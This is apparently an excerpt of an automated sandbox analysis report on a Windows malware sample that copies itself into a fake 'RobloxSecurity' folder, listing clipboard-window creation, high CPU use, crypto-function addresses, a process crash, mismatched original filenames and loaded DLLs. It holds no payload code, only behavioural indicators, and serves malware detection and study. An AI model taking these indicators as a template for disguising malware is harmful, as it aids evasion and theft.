Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior

Abnormal high CPU Usage

Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe

Process Stats: CPU usage > 49%

Detected potential crypto function

Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Code function: 0_2_02B8E00C	0_2_02B8E00C
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Code function: 0_2_06258E50	0_2_06258E50
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Code function: 0_2_0625A268	0_2_0625A268
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Code function: 0_2_06250006	0_2_06250006
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Code function: 0_2_06250040	0_2_06250040
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Code function: 0_2_067EEDD1	0_2_067EEDD1
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Code function: 0_2_06EF04F0	0_2_06EF04F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_04F5B490	1_2_04F5B490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_04F5B471	1_2_04F5B471
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_08803A98	1_2_08803A98
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Code function: 4_2_00007FFD9B9A2B4C	4_2_00007FFD9B9A2B4C
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 11_2_00007FFD9B98830A	11_2_00007FFD9B98830A
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 11_2_00007FFD9B972B4C	11_2_00007FFD9B972B4C
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 11_2_00007FFD9B989762	11_2_00007FFD9B989762
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 11_2_00007FFD9B987B8D	11_2_00007FFD9B987B8D
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 11_2_00007FFD9B977D15	11_2_00007FFD9B977D15
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 18_2_00007FFD9B978B08	18_2_00007FFD9B978B08
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 18_2_00007FFD9B9882EA	18_2_00007FFD9B9882EA
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 18_2_00007FFD9B972B4C	18_2_00007FFD9B972B4C
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 18_2_00007FFD9B989742	18_2_00007FFD9B989742
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 18_2_00007FFD9B987B6D	18_2_00007FFD9B987B6D
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 18_2_00007FFD9B977D59	18_2_00007FFD9B977D59
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 42_2_00007FFD9B982B4C	42_2_00007FFD9B982B4C
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 42_2_00007FFD9B9806D1	42_2_00007FFD9B9806D1
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 42_2_00007FFD9B987D59	42_2_00007FFD9B987D59
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 44_2_00007FFD9B962B4C	44_2_00007FFD9B962B4C
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 44_2_00007FFD9B967D59	44_2_00007FFD9B967D59
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 45_2_00007FFD9B992B4C	45_2_00007FFD9B992B4C
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 45_2_00007FFD9B9978F5	45_2_00007FFD9B9978F5

One or more processes crash

Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 8072 -s 1632

Sample file is different than original file name gathered from version info

Source: jqOHOuPMJP.exe, 00000000.00000002.1796380426.0000000000CF7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs jqOHOuPMJP.exe
Source: jqOHOuPMJP.exe, 00000000.00000002.1797186606.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs jqOHOuPMJP.exe
Source: jqOHOuPMJP.exe, 00000000.00000000.1644125840.0000000000946000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameLaps.exe4 vs jqOHOuPMJP.exe
Source: jqOHOuPMJP.exe, 00000000.00000002.1817862177.0000000003DAA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameHab9b84cf0be099b26b5d8bd8efac02917c.exeT vs jqOHOuPMJP.exe
Source: jqOHOuPMJP.exe	Binary or memory string: OriginalFilenameLaps.exe4 vs jqOHOuPMJP.exe

Tries to load missing DLLs

Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
